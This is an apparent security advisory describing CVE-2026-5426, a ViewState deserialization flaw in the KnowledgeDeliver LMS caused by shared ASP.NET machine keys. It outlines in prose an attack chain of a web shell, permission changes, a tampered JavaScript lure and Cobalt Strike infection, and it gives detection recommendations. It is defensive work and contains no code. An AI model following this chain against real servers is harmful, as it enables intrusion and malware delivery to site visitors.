KnowledgeDeliver ViewState Deserialization Vulnerability Exploitation

In late 2025, Mandiant investigated a security incident involving a compromised KnowledgeDeliver web server. KnowledgeDeliver, a Learning Management System (LMS) by Digital Knowledge, was found to be vulnerable to unauthenticated Remote Code Execution (RCE) due to the use of identical pre-shared ASP.NET machine keys across multiple customer deployments before February 24, 2026. This vulnerability, tracked as CVE-2026-5426, allowed an unknown threat actor to inject malicious code into the LMS platform. The attacker’s goal was to compromise users visiting the site through web shell deployment, file tampering, and eventual Cobalt Strike BEACON infection of user workstations. This highlights the critical importance of maintaining unique and secure machine keys for ASP.NET applications.

Attack Chain

1. The attacker identifies a KnowledgeDeliver instance with default ASP.NET machine keys.
2. The attacker crafts a malicious ViewState payload, exploiting CVE-2026-5426, by deserializing arbitrary objects.
3. The attacker sends the crafted ViewState payload within the __VIEWSTATE parameter in an HTTP POST request to the vulnerable KnowledgeDeliver server.
4. The server deserializes the malicious ViewState, leading to code execution within the w3wp.exe process.
5. The attacker deploys the BLUEBEAM (.NET-based Godzilla) in-memory web shell within the w3wp.exe process for persistence and command execution.
6. The attacker uses the icacls command to grant “Everyone” full access to the web application directory, escalating privileges.
7. The attacker modifies a JavaScript file to display a fake security alert, prompting users to install a malicious “security authentication plugin”.
8. The modified JavaScript silently loads a remote malicious script hosted on an attacker-controlled domain, ultimately leading to Cobalt Strike BEACON infection of user workstations.

Impact

Successful exploitation of CVE-2026-5426 allows an attacker to achieve unauthenticated remote code execution on KnowledgeDeliver servers. This can lead to the deployment of web shells, file tampering, and the infection of user workstations with malware such as Cobalt Strike. The modified JavaScript file displays a fake security alert, which tricks users into installing a malicious “security authentication plugin”, leading to further compromise. This incident underscores the critical risk posed by shared machine keys in ASP.NET applications.

Recommendation

• Monitor Windows Application logs for Event ID 1316 from the ASP.NET 4.0.30319.0 source related to ViewState verification failures, as described in the overview, especially event codes 4009.
• Monitor for unusual child processes spawned by w3wp.exe (IIS worker process), such as cmd.exe, whoami, and powershell.exe, as mentioned in the “Suspicious Process Activity” section.
• Implement file integrity monitoring for .js, .aspx, and .config files within the web root to detect unauthorized modifications, including the addition of remote script loaders, as described in the “File Integrity Monitoring” section.
• Deploy the Sigma rule “Detect KnowledgeDeliver BLUEBEAM Webshell Deployment” to detect post-exploitation activity related to web shell deployment.